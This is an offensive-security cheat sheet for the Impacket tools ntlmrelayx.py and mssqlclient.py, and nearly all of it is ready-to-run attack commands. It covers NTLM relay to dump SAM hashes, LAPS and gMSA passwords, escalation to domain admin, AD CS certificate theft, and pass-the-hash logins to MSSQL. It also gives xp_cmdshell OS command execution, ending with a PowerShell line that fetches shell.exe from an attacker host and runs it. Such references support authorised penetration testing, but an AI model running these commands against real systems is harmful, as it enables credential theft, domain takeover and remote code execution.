Impacket β Relay and MSSQL
Quick Reference
| Tool | Purpose |
|---|---|
ntlmrelayx.py |
Relay captured NTLM auth to SMB/LDAP/MSSQL/HTTP targets |
mssqlclient.py |
MSSQL TDS client β interactive shell, xp_cmdshell, file read |
ntlmrelayx.py
For every incoming NTLM authentication, relay it to one or more targets. Supports SMB, LDAP, MSSQL, HTTP, IMAP, and AD CS relay attacks.
Syntax:
ntlmrelayx.py [options] -t <target>
Common Usage:
# SMB relay β dump SAM (no command = secretsdump)
ntlmrelayx.py -t smb://<target> -smb2support
# SMB relay β execute command
ntlmrelayx.py -t smb://<target> -smb2support -c <command>
# SMB relay β execute file
ntlmrelayx.py -t smb://<target> -smb2support -e /path/to/payload.exe
# SMB relay β interactive SMB shell (connect via netcat on port 11000)
ntlmrelayx.py -t smb://<target> -smb2support -i
# LDAP relay β dump LDAP info + attempt to add DA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support
# LDAP relay β set RBCD (delegate-access for relayed machine account)
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --delegate-access
# LDAP relay β escalate specific user to DA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --escalate-user <username>
# LDAP relay β dump LAPS
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --dump-laps
# LDAP relay β dump gMSA
ntlmrelayx.py -t ldap://<dc-ip> -smb2support --dump-gmsa
# HTTP β SMB relay (WebDAV/NTLM auth on HTTP port)
ntlmrelayx.py -t smb://<target> --no-smb-server --http-port 80 -smb2support
# Multi-target from file
ntlmrelayx.py -tf targets.txt -smb2support
# SOCKS proxy mode (reuse session after relay)
ntlmrelayx.py -t smb://<target> -smb2support -socks
# CVE-2019-1040 (drop MIC, relay signing-required connections)
ntlmrelayx.py -t smb://<target> -smb2support --remove-mic
# AD CS ESC8 relay β get certificate for impersonated user
ntlmrelayx.py -t http://<ca-host>/certsrv/certfnsh.asp --adcs --template User
# AD CS β relay DC machine account for DomainController template
ntlmrelayx.py -t http://<ca-host>/certsrv/certfnsh.asp --adcs --template DomainController
# Shadow Credentials relay
ntlmrelayx.py -t ldap://<dc-ip> --shadow-credentials --shadow-target <target-account>
# IPv6 listener
ntlmrelayx.py -t smb://<target> -smb2support -6
# Keep relaying (don't stop after first success)
ntlmrelayx.py -t smb://<target> -smb2support --keep-relaying
# Store loot in directory
ntlmrelayx.py -t smb://<target> -smb2support -l /tmp/loot
# Disable SMB server (only listen on HTTP)
ntlmrelayx.py -t smb://<target> --no-smb-server --http-port 8080
Key Options:
- -t <target> β Relay target (smb://, ldap://, ldaps://, mssql://, http://)
- -tf <file> β File of relay targets
- -smb2support β Enable SMB2 (almost always needed)
- -c <command> β Command to run on SMB target
- -e <file> β File to execute on SMB target
- -i / --interactive β Launch interactive shell (SMB/LDAP/SQL)
- -socks β SOCKS proxy mode (port 1080)
- -l <dir> / --lootdir <dir> β Directory for loot
- -of <file> β Output file for NTLMv2 hashes
- -dh / --dump-hashes β Show hashes in console
- --remove-mic β Drop MIC (CVE-2019-1040)
- --keep-relaying β Keep relaying after first success
- --no-multirelay β Disable multi-host relay
- -ip <ip> β Bind interface IP
- --smb-port <port> β SMB listener port (default 445)
- --http-port <port> β HTTP listener port(s)
- -6 / --ipv6 β Listen on IPv6
- -wh <host> / --wpad-host <host> β Serve WPAD for proxy auth capture
LDAP-specific:
- --no-dump β Don't dump LDAP
- --no-da β Don't attempt to add DA
- --no-acl β Disable ACL attacks
- --escalate-user <username> β Escalate specific user via ACL
- --delegate-access β RBCD delegation on relayed computer
- --dump-laps β Dump LAPS passwords
- --dump-gmsa β Dump gMSA passwords
- --dump-adcs β Dump ADCS info
- --add-dns-record <name> <ip> β Add DNS record via LDAP
AD CS (ESC8):
- --adcs β Enable ADCS relay attack
- --template <template> β Certificate template name
- --altname <name> β Subject Alternative Name (ESC1/ESC6)
Shadow Credentials:
- --shadow-credentials β Enable shadow creds attack
- --shadow-target <account> β Target account for msDS-KeyCredentialLink
- --export-type {PEM,PFX} β Certificate export format
- --cert-outfile-path <path> β Output path for cert
Notes:
- SMB signing must be disabled on the target for SMB relay to work
- Check with CheckLDAPStatus.py / DumpNTLMInfo.py before attacking
- SOCKS mode: after relay, use proxychains with any tool against 127.0.0.1:1080
- Interactive mode: nc 127.0.0.1 11000 for SMB shell
mssqlclient.py
TDS client for Microsoft SQL Server β interactive SQL shell with support for xp_cmdshell, file ops, and linked server abuse.
Syntax:
mssqlclient.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Connect with SQL auth
mssqlclient.py <username>:<password>@<target>
# Connect with Windows auth
mssqlclient.py -windows-auth <domain>/<username>:<password>@<target>
# Pass-the-Hash (Windows auth)
mssqlclient.py -windows-auth -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> mssqlclient.py -k -no-pass -windows-auth <domain>/<username>@<target>
# Specific database
mssqlclient.py <username>:<password>@<target> -db master
# Custom port
mssqlclient.py <username>:<password>@<target> -port 1434
# Run command directly (non-interactive)
mssqlclient.py <username>:<password>@<target> -command "SELECT @@version"
Shell Commands (once connected):
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute OS command
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell '<command>';
-- Read file (requires BULK INSERT permissions)
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS Data;
-- Read file via xp_cmdshell
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt';
-- Write file (via xp_cmdshell)
EXEC xp_cmdshell 'echo test > C:\Windows\Temp\test.txt';
-- List linked servers
SELECT name FROM sys.servers;
-- Execute on linked server
EXEC ('EXEC xp_cmdshell ''whoami''') AT [<linked-server>];
-- Check current user and privileges
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
-- List databases
SELECT name FROM sys.databases;
-- Check users
SELECT name, type_desc FROM sys.server_principals;
Impacket shell helper commands:
enable_xp_cmdshell β Enable xp_cmdshell in one command
xp_cmdshell <command> β Run OS command
Options:
- -windows-auth β Windows/domain authentication (default: SQL auth)
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth (requires -windows-auth)
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP (for Kerberos)
- -target-ip <target> β Target IP override
- -port <port> β MSSQL port (default: 1433)
- -db <db> β Database instance to connect to
- -command <cmd> β SQL command(s) to run non-interactively
- -file <file> β File of SQL commands to run
- --host-name <name> β HostName property in connection string
- --app-name <name> β AppName property in connection string
- -show β Print queries as they run
Upload file via xp_cmdshell:
-- PowerShell download to target
EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadFile(''http://<attacker>/shell.exe'',''C:\Windows\Temp\shell.exe'')"';
EXEC xp_cmdshell 'C:\Windows\Temp\shell.exe';